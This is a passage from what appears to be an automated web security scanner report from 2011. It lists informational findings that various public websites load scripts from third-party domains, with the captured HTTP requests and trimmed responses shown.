X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...

19.181. http://www.localsearch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localsearch.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.localsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:12:05 GMT
Server: Unspecified
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lm0uuwyk1gzm3azhc3xuz5vt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21726
Set-Cookie: NSC_xxx-mpdbmtfbsdi-dpn-80=ffffffff9482028145525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:30:59 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   The Local Sear
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

19.182. http://www.lwis.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lwis.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.lwis.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:24 GMT
Server: Apache
Last-Modified: Sun, 26 Sep 2010 16:52:45 GMT
ETag: "5914026-2c9-4c9f7a5d"
Accept-Ranges: bytes
Content-Length: 713
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<title>LWIS.NET - Highly Qualified Web Development</title>
<meta charset="utf-8" />
<meta name="description" content="Live Web Institute (lwis.net)
...[SNIP]...
<body>

<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.183. http://www.manta.com/c/mm49ryk/a-b-c-development-company-inc/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manta.com
Path:   /c/mm49ryk/a-b-c-development-company-inc/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 20:28:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-UA-Compatible: IE=EmulateIE8
Vary: Accept-Encoding
Set-Cookie: tcc=one; path=/
Set-Cookie: abtest_v=version&7&site_wide&claimbutton.control; path=/
Set-Cookie: member_session=UmFuZG9tSVZDXysA%5BS%5DCWsGpZJaj0sDqAt3Qj8AAoQFPbOBf7rrCY6lYGPtsEyTlueYzU4Ng64mj5DmsgbfcWNKrZGp6UV3Ll5u5Muh5b8JEtFGe%5BP%5DaEKWvw65AHkGWteILjBVuFz1jjWqjy7LZBTvEvbx5XbZZF03hS7b9DVF6ff%5BS%5DlZoIt%5BS%5Drr3OPqRmO5DeRFflwRyOUZWc5e4K62A7xN6lkweT2Glj9fUIgXkFAVckBCEgTy7H%5BP%5DluqEDQwHIte54Cei0DtflweKRv6pQGPHbAKA%5BE%5D%5BE%5D; domain=.manta.com; path=/; expires=Sat, 05-Mar-2011 20:28:16 GMT
Set-Cookie: refer_id=0000; domain=.manta.com; path=/
Set-Cookie: refer_id_persistent=0000; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:16 GMT
Set-Cookie: cust_id=1296764896.830343-519; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:16 GMT
Via: 1.0 www.manta.com
Content-Length: 52215
X-Varnish: 1847049511
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>A B C Development
...[SNIP]...
</script><script type="text/javascript" src="http://m3.manta-r1.com/aggregator/22477/js-min/manta::js::jquery::jquery-1.4.2.min/manta::js::jquery::plugins::jquery.subscribe/manta::js::jquery::plugins::jquery.jcache/manta::js::add_company_bar/manta::js::adsense.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>    
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=Manta"></script>
...[SNIP]...
</a>
       <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>
       <script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<div style="display:none;">    
   <SCRIPT TYPE="text/javascript" SRC="http://loadus.exelator.com/load/?p=145&c=21777&g=001&job="></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!--/Quantcast--><script type="text/javascript" src="http://m5.manta-r1.com/aggregator/22477/js-min/js::ecnext::JsonService.jquery/manta::js::profile_badge.jquery/manta::js::company_profile::company_profile_base/manta::js::company_profile::company_profile_unclaimed/manta::js::jquery::jquery-ui-1.8.custom.min/manta::js::company_profile::CompanyPageCRMLite/manta::js::company_profile::company_profile_popup_dnb/manta::js::messagebox/js::main_nav::drawer-companies/js::main_nav::drawer-resources/manta::js::footer/manta::js::base/js::ecnext::tooltip/manta::js::advertising::overlay.js"></script>
...[SNIP]...

19.184. http://www.manta.com/c/mm8136k/abc-development-inc/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manta.com
Path:   /c/mm8136k/abc-development-inc/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 20:28:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-UA-Compatible: IE=EmulateIE8
Vary: Accept-Encoding
Set-Cookie: tcc=one; path=/
Set-Cookie: abtest_v=version&7&site_wide&adsenseurl.i; path=/
Set-Cookie: member_session=UmFuZG9tSVal7bOT1aWDpS%5BS%5DYHa5elnas1i8FyBu96eHtVxkOzSTAkYqzjbSyN6kyrcEkolEXnIov%5BP%5DNQYJYwp%5BS%5DMR6GmN4JVJGCLWShxUnyRxM1JKLnGsJd%5BP%5DpEQmd2FxR9dBmv0oSQZzlWRLhK63xHsXj2od2mdXI9abrzBxwNryHqU4tFdM5CCpZcqKp53DjBiaE0oTZl76SyA%5BP%5DVWmV%5BP%5Dl6bCbl6JiVFizfhvyNBHxuZJB7Ei7%5BP%5DhAk2cupNjp84JqLXZhVliop9Z5T9YZqAvHxiw%5BE%5D%5BE%5D; domain=.manta.com; path=/; expires=Sat, 05-Mar-2011 20:28:14 GMT
Set-Cookie: refer_id=0000; domain=.manta.com; path=/
Set-Cookie: refer_id_persistent=0000; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:14 GMT
Set-Cookie: cust_id=1296764894.813410-573; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:14 GMT
Via: 1.0 www.manta.com
Content-Length: 52971
X-Varnish: 1811565262
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Abc Development In
...[SNIP]...
</script><script type="text/javascript" src="http://m3.manta-r1.com/aggregator/22477/js-min/manta::js::jquery::jquery-1.4.2.min/manta::js::jquery::plugins::jquery.subscribe/manta::js::jquery::plugins::jquery.jcache/manta::js::add_company_bar/manta::js::adsense.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>    
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=Manta"></script>
...[SNIP]...
</a>
       <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>
       <script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<div style="display:none;">    
   <SCRIPT TYPE="text/javascript" SRC="http://loadus.exelator.com/load/?p=145&c=21777&g=001&job="></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!--/Quantcast--><script type="text/javascript" src="http://m5.manta-r1.com/aggregator/22477/js-min/js::ecnext::JsonService.jquery/manta::js::profile_badge.jquery/manta::js::company_profile::company_profile_base/manta::js::company_profile::company_profile_unclaimed/manta::js::jquery::jquery-ui-1.8.custom.min/manta::js::company_profile::CompanyPageCRMLite/manta::js::company_profile::company_profile_popup_dnb/manta::js::messagebox/js::main_nav::drawer-companies/js::main_nav::drawer-resources/manta::js::footer/manta::js::base/js::ecnext::tooltip/manta::js::advertising::overlay.js"></script>
...[SNIP]...

19.185. http://www.milanoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milanoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.milanoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: milanooId=caa4dd2ddd2fa909515c8860d4864921; path=/
Set-Cookie: milanooId=0ae3e4e9d51c2e0247e06c0bf5f350b0; path=/
Set-Cookie: lang_cookie=en-uk; expires=Sun, 31-Jan-2021 20:29:30 GMT; path=/
Set-Cookie: CurrencyCode=USD; expires=Sat, 05-Mar-2011 20:29:30 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...
<div style="display:none">
<script src='http://s93.cnzz.com/stat.php?id=968786&web_id=968786' language='JavaScript' charset='gb2312'></script>
...[SNIP]...
</script>


<script src="https://server.iad.liveperson.net/hcp/html/liveengage3.js"></script>
...[SNIP]...

19.186. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.msn.com
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:29:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA41
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=813II6a37_1229:C~126II4a36_0830:WP10_4~271II8B37_0107:C|; domain=www.msn.com; expires=Mon, 07-Feb-2011 02:29:37 GMT; path=/
Set-Cookie: expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=msn.com; expires=Fri, 18-Feb-2011 02:29:37 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 80938
Content-Length: 80938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

19.187. http://www.myservicemonster.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myservicemonster.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.myservicemonster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 15:27:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 7851
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="myservicemonster">

...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.188. http://www.oakland.edu/cdf/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oakland.edu
Path:   /cdf/x22

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cdf/x22 HTTP/1.1
Host: www.oakland.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 03 Feb 2011 20:26:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</a><script src="https://secure.addthis.com/js/152/addthis_widget.js" type="text/javascript"></script>
...[SNIP]...

19.189. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:21:04 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6511c3d78eq0k3q224uiic1f03; expires=Sat, 26-Feb-2011 22:54:24 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:16:24 GMT
ETag: "61d277c2c3aa0a9af5e36cf0f001eba2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.190. http://www.orgplus.com/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orgplus.com
Path:   /x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /x22 HTTP/1.1
Host: www.orgplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 00:28:12 GMT
Server: Apache/2.0.53 (Fedora)
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 12720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript"
src="http://chat.livechatinc.net/licence/1020961/script.cgi?lang=en&groups=0">
</script>
...[SNIP]...
<!-- Crazy Egg -->
<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/0276.js"></script>
...[SNIP]...
<!-- Marketo -->
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://www.leadforce1.com" title="Analytics" onclick="window.open(this.href);return(false);">
<script language="javascript" src="http://leadforce1.com/bf/bf.js" type="text/javascript"></script>
...[SNIP]...
</BODY> tag -->
<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...

19.191. http://www.owasp.org/index.php/Top_10_2010-A2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.owasp.org
Path:   /index.php/Top_10_2010-A2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.php/Top_10_2010-A2 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.owasp.org
Cookie: OAID=04f018b0c68d275c665f36b46a5558db; __utmc=77342603; __utma=77342603.1072302748.1296759700.1296759700.1296759700.1; __utmz=77342603.1296759700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:49:44 GMT
Server: Apache/2.2.14 (Fedora)
Vary: Accept-Encoding,Cookie
Content-language: en
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=04f018b0c68d275c665f36b46a5558db; expires=Sat, 04-Feb-2012 02:49:45 GMT; path=/
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=wiki15Token;string-contains=wiki15LoggedOut;string-contains=wiki15_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Mon, 18 Oct 2010 19:44:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:
...[SNIP]...
</script>
       <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/utilities/utilities.js"></script>        <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/tabview/tabview-min.js"></script>        <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/event/event-min.js"></script>        <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/history/history-min.js"></script>
...[SNIP]...

19.192. http://www.pctools.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pctools.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Thu, 03 Feb 2011 22:02:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33414

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <title>PC Tools | Download Antivirus Software &amp; PC Software Utilities</ti
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

19.193. http://www.quantcast.com/p-aasG6JkxVvmNA  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p-aasG6JkxVvmNA HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 03 Feb 2011 22:03:02 GMT
Expires: Wed, 02 Feb 2011 10:03:02 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=1|69|1296770582348|0|NOTSET; Expires=Sat, 26-Jan-2041 22:03:02 GMT; Path=/
Set-Cookie: JSESSIONID=64B221D97727744347E466E5663A8A8D; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

19.194. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfweekly.com
Path:   /2010-08-11/news/ihelp-for-autism/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2010-08-11/news/ihelp-for-autism/ HTTP/1.1
Host: www.sfweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d Zend Core/2.5.0 PHP/5.2.4
X-Powered-By: Zend Core/2.5.0 PHP/5.2.4
Cache-Control: public, max-age=900, s-maxage=900
Pragma: cache
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Age: 57
Date: Thu, 03 Feb 2011 17:54:17 GMT
Expires: Thu, 03 Feb 2011 18:08:20 GMT
Content-Length: 263362
Connection: close


<!doctype html public "-//w3c//dtd html 4.01 transitional//en" "http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta name='google-site-verification' content='JJc5K-OyKVMz5QCREOmr5SX-rsF
...[SNIP]...
</a>
<script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...
<li class="Stumble_Upon"><script type="text/javascript" src="http://www.stumbleupon.com/hostedbadge.php?s=1&r=http%3A%2F%2Fwww.sfweekly.com%2F2010-08-11%2Fnews%2Fihelp-for-autism"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
<!-- /pagecontainer -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://sfweeklycom.skimlinks.com/api/skimlinks.js"></script>
...[SNIP]...

19.195. http://www.shopireland.ie/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopireland.ie
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.shopireland.ie
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:21:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 20614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://develo
...[SNIP]...
<br style="clear:both" />
    <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
...[SNIP]...

19.196. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=37svlldgsf347c7s87vtp7eur6; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=7201754904d4b1ced1c53d1.18537805; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=e47999cdfca3ca02d942318b09c2ef89%7C%7C10%7C%7C1296768237%7C6c3c55f74134ae4c580f9262aa023fd3; expires=Sun, 31-Jan-2021 21:23:57 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7306
Date: Thu, 03 Feb 2011 21:23:57 GMT
X-Varnish: 20282270
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
               
               <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
       
       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110203"></script>
...[SNIP]...
